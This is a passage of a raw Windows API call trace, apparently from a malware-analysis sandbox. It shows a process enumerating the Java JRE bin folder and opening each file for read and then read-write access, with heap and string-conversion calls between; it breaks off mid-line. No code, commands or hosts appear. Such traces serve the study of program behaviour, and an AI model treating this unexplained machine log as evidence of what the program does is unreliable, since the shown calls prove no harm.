[0092.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71a30 [0092.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e458, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe") returned 47 [0092.987] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jjs.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jjs.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3e40)) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0092.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.987] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.987] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2aa40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jli.dll", cAlternateFileName="")) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0092.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0092.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0092.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0092.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0092.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0092.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.988] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0092.988] AreFileApisANSI () returned 1 [0092.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll", lpUsedDefaultChar=0x0) returned 47 [0092.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0092.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.988] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0092.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0092.988] AreFileApisANSI () returned 1 [0092.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0092.988] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x717c0 [0092.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 47 [0092.988] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.989] GetFileType (hFile=0x360) returned 0x1 [0092.989] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0092.989] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0092.989] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0092.989] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0092.989] CloseHandle (hObject=0x360) returned 1 [0092.989] AreFileApisANSI () returned 1 [0092.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b68 [0092.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 47 [0092.990] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.990] GetFileType (hFile=0x360) returned 0x1 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0092.990] CloseHandle (hObject=0x360) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.990] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.990] AreFileApisANSI () returned 1 [0092.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0092.990] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71b00 [0092.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=47 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll") returned 47 [0092.991] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jli.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jli.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa75aa64d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2aa40)) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0092.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.991] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa897bfc2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x48440, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jp2iexp.dll", cAlternateFileName="")) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.991] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0092.991] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0092.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.991] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0092.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.992] AreFileApisANSI () returned 1 [0092.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll", lpUsedDefaultChar=0x0) returned 51 [0092.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0092.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0092.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0092.992] AreFileApisANSI () returned 1 [0092.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0092.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x45ef8 [0092.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x45ef8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 51 [0092.992] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.992] GetFileType (hFile=0x360) returned 0x1 [0092.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45ef8 | out: hHeap=0x20000) returned 1 [0092.992] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0092.993] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0092.993] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0092.993] CloseHandle (hObject=0x360) returned 1 [0092.993] AreFileApisANSI () returned 1 [0092.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0092.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x460b8 [0092.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 51 [0092.993] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0092.993] GetFileType (hFile=0x360) returned 0x1 [0092.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0092.994] CloseHandle (hObject=0x360) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.994] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0092.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0092.995] AreFileApisANSI () returned 1 [0092.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x66) returned 0x462e8 [0092.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53520, cbMultiByte=-1, lpWideCharStr=0x462e8, cchWideChar=51 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll") returned 51 [0092.995] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jp2iexp.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jp2iexp.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa75aa64d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa75aa64d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa897bfc2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x48440)) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0092.995] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0092.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.995] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0092.995] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa897bfc2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa897bfc2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89a2223, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1b640, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="jp2launcher.exe", cAlternateFileName="JP2LAU~1.EXE")) returned 1 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0092.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0092.995] RtlAllocateHeap 